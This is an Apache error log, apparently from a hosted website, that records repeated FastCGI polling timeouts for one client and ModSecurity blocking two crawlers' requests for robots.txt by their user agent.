[Sun Mar 15 10:05:50.133774 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47714] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:06:11.141794 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:06:33.129803 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48378] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:06:55.076680 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:07:16.129806 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:07:32.814923 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.228.16:35814] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abavFNSswJuvopo3lOjVSAAAAI0"]
[Sun Mar 15 10:07:37.046022 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:07:58.125778 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49518] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:08:19.049848 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:08:40.137788 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:09:01.057811 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50320] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:09:23.059868 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:09:44.130506 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50966] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:10:05.141789 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:10:26.133804 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:10:47.125800 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:11:09.073892 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52168] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:11:30.133817 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:11:54.125909 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52790] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:11:55.791193 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:45518] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abawG9SswJuvopo3lOjV7QAAAII"]
[Sun Mar 15 10:12:19.137807 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:12:40.038902 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.228.16:59546] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abawSHjZBu2q05ozVU_FXAAAAVQ"]
[Sun Mar 15 10:12:41.036526 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:13:02.118492 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:13:23.125869 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54068] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:13:44.072932 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54392] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:14:05.137906 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:14:26.121191 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54936] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:14:47.113830 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55212] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:15:08.137841 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:15:29.129819 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:15:50.129846 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:16:12.145896 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56290] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:16:33.133815 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:16:54.087958 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:17:15.121817 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57238] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:17:18.914717 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.244.31:60138] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaxXnjZBu2q05ozVU_GJAAAAUM"]
[Sun Mar 15 10:17:40.122456 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57488] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:17:58.054770 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.228.16:60296] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaxhnjZBu2q05ozVU_GQwAAAU8"]
[Sun Mar 15 10:18:02.133890 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57764] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:18:24.125786 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:18:45.121804 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:19:06.137800 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:19:27.125886 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:19:48.134281 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59206] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:20:09.045807 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59546] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:20:30.126754 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:20:51.080490 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:21:12.161867 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:21:34.121766 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:21:55.134675 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:32906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:22:16.120278 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33192] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:22:29.895219 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.244.31:49540] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaylZqj1wV0Si-OkedOYQAAABA"]
[Sun Mar 15 10:22:37.129803 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33480] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:23:01.127825 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33848] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:23:12.038726 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.228.16:45958] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaywNSswJuvopo3lOjX0wAAAIM"]
[Sun Mar 15 10:23:22.129825 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34100] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:23:45.121808 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34386] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:24:07.061891 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:24:28.137837 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:24:49.685858 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:25:11.125983 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35406] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:25:32.101891 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:25:53.135732 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:26:15.125835 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:26:37.133800 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:26:58.129791 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:27:19.066536 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37204] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:27:40.135254 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:28:00.523903 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.244.31:33608] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaz4Jqj1wV0Si-OkedPPAAAABc"]
[Sun Mar 15 10:28:01.121836 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37716] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:28:23.148410 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:28:34.639732 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:37156] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba0AtSswJuvopo3lOjYkgAAAIw"]
[Sun Mar 15 10:28:45.153780 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:29:06.125841 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38582] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:29:29.125801 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38864] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:29:50.129839 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:30:11.135998 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:30:32.119128 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39744] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:30:53.141784 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40088] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:31:14.037840 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:31:35.126692 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40598] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:31:59.129807 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40990] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:32:20.134339 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:32:41.125844 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:33:02.125837 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41700] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:33:09.762088 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.244.31:36148] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba1FXjZBu2q05ozVU_IkwAAAU8"]
[Sun Mar 15 10:33:23.099935 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:33:38.879654 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.228.16:42502] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba1MrABkC4fWIHEf8FewAAAAEY"]
[Sun Mar 15 10:33:44.124265 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42154] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:34:06.133781 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:34:28.129780 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:34:49.125829 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:35:11.125785 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:35:32.132505 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:35:53.109909 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:36:14.125817 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:36:36.344355 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44358] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:36:58.125771 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:37:21.116168 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:37:42.129984 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45214] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:38:03.121847 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45484] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:38:25.120673 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45728] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:38:31.955710 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.244.31:33186] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba2V9SswJuvopo3lOjaGgAAAJM"]
[Sun Mar 15 10:38:47.383178 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:38:55.790104 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.228.16:47354] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba2b3bQATo66fKoS7y6_AAAANI"]
[Sun Mar 15 10:39:09.122432 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46226] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:39:30.129846 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46546] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:39:52.105817 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:40:13.126825 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47160] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:40:34.113774 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47452] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:40:55.094444 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:41:16.071102 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47998] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:41:37.125771 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48238] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:41:59.110771 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48546] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:42:21.133873 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48876] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:42:45.124667 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:43:06.121962 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49360] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:43:27.137176 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49604] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:43:48.069824 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:44:02.506651 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.228.16:44016] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba3onbQATo66fKoS7y7sgAAAMo"]
[Sun Mar 15 10:44:09.125069 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:44:31.125795 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:44:52.127366 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:44:53.803177 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.244.31:40250] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aba31XbQATo66fKoS7y71AAAANQ"]
[Sun Mar 15 10:45:14.120827 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51046] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:45:36.133773 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:45:57.126610 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:46:18.117839 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51794] AH01075: Error dispatching request to : (polling)
